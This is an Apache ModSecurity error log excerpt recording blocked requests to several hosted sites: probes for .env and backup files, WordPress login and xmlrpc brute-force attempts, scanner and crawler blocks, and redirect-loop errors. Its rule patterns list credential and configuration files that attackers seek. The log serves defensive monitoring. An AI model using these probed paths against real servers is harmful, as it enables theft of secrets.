[Tue May 26 16:49:09.461085 2026] [security2:error] [pid 817651:tid 817797] [client 176.65.139.239:36966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "krishnaenterprises.onesoft.in"] [uri "/.env"] [unique_id "ahWBrdlGRCPPN1dS2y28GwAAAJU"]
[Tue May 26 16:49:09.716974 2026] [security2:error] [pid 817651:tid 817904] [client 176.65.139.229:41784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "masonicarkfoundation.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBrdlGRCPPN1dS2y28HwAAAQA"]
[Tue May 26 16:49:09.742212 2026] [security2:error] [pid 817651:tid 817906] [client 176.65.139.232:48922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "fonefix.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBrdlGRCPPN1dS2y28IQAAAQI"]
[Tue May 26 16:49:09.902257 2026] [security2:error] [pid 823496:tid 823671] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBrJa08mrtyBNpA4PcjwAAACs"]
[Tue May 26 16:49:09.915299 2026] [security2:error] [pid 823496:tid 823687] [client 176.65.139.238:20732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBrZa08mrtyBNpA4PcmQAAADs"]
[Tue May 26 16:49:10.209530 2026] [security2:error] [pid 817651:tid 817896] [client 176.65.139.233:37926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBrtlGRCPPN1dS2y28KAAAAPg"]
[Tue May 26 16:49:10.561988 2026] [security2:error] [pid 823496:tid 823752] [client 117.198.37.168:51357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBrpa08mrtyBNpA4PcngAAAHw"]
[Tue May 26 16:49:10.562161 2026] [security2:error] [pid 823496:tid 823752] [client 117.198.37.168:51357] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBrpa08mrtyBNpA4PcngAAAHw"]
[Tue May 26 16:49:11.514618 2026] [security2:error] [pid 817651:tid 817860] [client 35.204.134.146:24576] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.root.redirefr.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWBr9lGRCPPN1dS2y28MAAAANQ"]
[Tue May 26 16:49:11.514755 2026] [security2:error] [pid 817651:tid 817860] [client 35.204.134.146:24576] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.root.redirefr.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWBr9lGRCPPN1dS2y28MAAAANQ"]
[Tue May 26 16:49:11.851123 2026] [security2:error] [pid 817651:tid 817869] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBrtlGRCPPN1dS2y28KwAAAN0"]
[Tue May 26 16:49:13.476845 2026] [security2:error] [pid 823496:tid 823705] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBr5a08mrtyBNpA4PcsQAAAE0"]
[Tue May 26 16:49:14.290242 2026] [security2:error] [pid 823496:tid 823628] [client 31.57.184.107:51635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.observance111.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWBspa08mrtyBNpA4PcwwAAAAA"], referer: https://duckduckgo.com/
[Tue May 26 16:49:15.605031 2026] [security2:error] [pid 823496:tid 823741] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBspa08mrtyBNpA4PcyQAAAHE"]
[Tue May 26 16:49:18.167289 2026] [security2:error] [pid 823496:tid 823694] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBs5a08mrtyBNpA4Pc5AAAAEI"]
[Tue May 26 16:49:18.675507 2026] [security2:error] [pid 817651:tid 817822] [client 114.119.136.155:64027] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/gci-grandofficers.htm"] [unique_id "ahWBttlGRCPPN1dS2y28dgAAAK4"], referer: http://grandconclaveindia.org.in/gci-grandofficers.htm
[Tue May 26 16:49:19.482395 2026] [security2:error] [pid 823496:tid 823650] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBtZa08mrtyBNpA4Pc9wAAABY"]
[Tue May 26 16:49:20.847957 2026] [security2:error] [pid 817651:tid 817854] [client 117.198.37.168:51673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBuNlGRCPPN1dS2y28hAAAAM4"]
[Tue May 26 16:49:20.848088 2026] [security2:error] [pid 817651:tid 817854] [client 117.198.37.168:51673] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBuNlGRCPPN1dS2y28hAAAAM4"]
[Tue May 26 16:49:20.922908 2026] [security2:error] [pid 823496:tid 823598] [remote 74.7.241.58:52490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWBuJa08mrtyBNpA4PdFQAAcWM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:49:21.006192 2026] [security2:error] [pid 823496:tid 823684] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBt5a08mrtyBNpA4PdCwAAADg"]
[Tue May 26 16:49:23.165191 2026] [security2:error] [pid 823496:tid 823674] [client 77.83.39.197:49562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/.env"] [unique_id "ahWBu5a08mrtyBNpA4PdKgAAAC4"]
[Tue May 26 16:49:23.343115 2026] [security2:error] [pid 823496:tid 823716] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBupa08mrtyBNpA4PdJAAAAFg"]
[Tue May 26 16:49:25.603412 2026] [security2:error] [pid 823496:tid 823664] [client 123.28.244.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBu5a08mrtyBNpA4PdOAAAACQ"]
[Tue May 26 16:49:25.684790 2026] [security2:error] [pid 823496:tid 823646] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBu5a08mrtyBNpA4PdOwAAABI"]
[Tue May 26 16:49:25.913173 2026] [security2:error] [pid 823496:tid 823705] [client 45.89.106.116:53210] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBvZa08mrtyBNpA4PdSwAAAE0"]
[Tue May 26 16:49:26.655480 2026] [security2:error] [pid 823496:tid 823668] [client 192.178.8.73:42372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/temple-significance.php"] [unique_id "ahWBvpa08mrtyBNpA4PdTwAAACg"]
[Tue May 26 16:49:26.907038 2026] [security2:error] [pid 817651:tid 817876] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBvdlGRCPPN1dS2y28oQAAAOQ"]
[Tue May 26 16:49:27.230770 2026] [security2:error] [pid 817651:tid 817747] [remote 95.216.117.13:34018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWBv9lGRCPPN1dS2y28sAAA1V8"]
[Tue May 26 16:49:27.461035 2026] [security2:error] [pid 823496:tid 823705] [client 45.89.106.116:53210] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBvZa08mrtyBNpA4PdSwAAAE0"]
[Tue May 26 16:49:27.461094 2026] [security2:error] [pid 823496:tid 823705] [client 45.89.106.116:53210] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBvZa08mrtyBNpA4PdSwAAAE0"]
[Tue May 26 16:49:27.698880 2026] [core:error] [pid 823496:tid 823679] [client 5.255.99.53:46920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:27.698910 2026] [core:error] [pid 823496:tid 823679] [client 5.255.99.53:46920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.610752 2026] [security2:error] [pid 823496:tid 823677] [client 45.89.106.116:40834] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBwJa08mrtyBNpA4PdZgAAADE"]
[Tue May 26 16:49:28.835530 2026] [security2:error] [pid 823496:tid 823648] [client 5.255.99.53:47058] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.poonawallatennisacademy.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahWBwJa08mrtyBNpA4PdcAAAABQ"]
[Tue May 26 16:49:28.844859 2026] [core:error] [pid 823496:tid 823650] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.844882 2026] [core:error] [pid 823496:tid 823650] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.845289 2026] [core:error] [pid 817651:tid 817835] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.845305 2026] [core:error] [pid 817651:tid 817835] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.845552 2026] [core:error] [pid 817651:tid 817834] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.845566 2026] [core:error] [pid 817651:tid 817834] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.847381 2026] [core:error] [pid 823496:tid 823731] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.847402 2026] [core:error] [pid 823496:tid 823731] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.906228 2026] [security2:error] [pid 823496:tid 823677] [client 45.89.106.116:40834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBwJa08mrtyBNpA4PdZgAAADE"]
[Tue May 26 16:49:28.949493 2026] [security2:error] [pid 817651:tid 817830] [client 5.255.99.53:47134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.poonawallatennisacademy.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahWBwNlGRCPPN1dS2y28zQAAALY"]
[Tue May 26 16:49:28.963252 2026] [core:error] [pid 823496:tid 823754] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:28.963269 2026] [core:error] [pid 823496:tid 823754] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.210327 2026] [core:error] [pid 823496:tid 823631] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.210362 2026] [core:error] [pid 823496:tid 823631] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.386168 2026] [core:error] [pid 823496:tid 823669] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.386188 2026] [core:error] [pid 823496:tid 823669] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.462090 2026] [security2:error] [pid 823496:tid 823657] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBv5a08mrtyBNpA4PdXgAAAB0"]
[Tue May 26 16:49:29.702839 2026] [core:error] [pid 823496:tid 823628] [client 5.255.99.53:47230] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.702865 2026] [core:error] [pid 823496:tid 823628] [client 5.255.99.53:47230] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.714577 2026] [core:error] [pid 823496:tid 823740] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:29.714597 2026] [core:error] [pid 823496:tid 823740] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:30.324014 2026] [security2:error] [pid 817651:tid 817853] [client 114.119.133.194:20407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWBwtlGRCPPN1dS2y288AAAAM0"], referer: http://haddingtonwines.com/cart?remove_item=350db081a661525235354dd3e19b8c05
[Tue May 26 16:49:30.359016 2026] [security2:error] [pid 823496:tid 823721] [client 45.89.106.116:40838] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBwpa08mrtyBNpA4PdigAAAF0"]
[Tue May 26 16:49:30.685761 2026] [security2:error] [pid 823496:tid 823721] [client 45.89.106.116:40838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBwpa08mrtyBNpA4PdigAAAF0"]
[Tue May 26 16:49:31.058837 2026] [security2:error] [pid 823496:tid 823681] [client 77.83.39.197:38442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env"] [unique_id "ahWBw5a08mrtyBNpA4PdlAAAADU"]
[Tue May 26 16:49:31.112650 2026] [security2:error] [pid 817651:tid 817823] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBwdlGRCPPN1dS2y282wAAAK8"]
[Tue May 26 16:49:31.130595 2026] [core:error] [pid 823496:tid 823637] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:31.130644 2026] [core:error] [pid 823496:tid 823637] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:31.288043 2026] [security2:error] [pid 823496:tid 823747] [client 117.198.37.168:51993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBw5a08mrtyBNpA4PdmAAAAHc"]
[Tue May 26 16:49:31.288174 2026] [security2:error] [pid 823496:tid 823747] [client 117.198.37.168:51993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBw5a08mrtyBNpA4PdmAAAAHc"]
[Tue May 26 16:49:31.852804 2026] [security2:error] [pid 823496:tid 823694] [client 45.89.106.116:40844] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBw5a08mrtyBNpA4PdogAAAEI"]
[Tue May 26 16:49:32.174840 2026] [core:error] [pid 823496:tid 823666] [client 5.255.99.53:47576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.174871 2026] [core:error] [pid 823496:tid 823666] [client 5.255.99.53:47576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
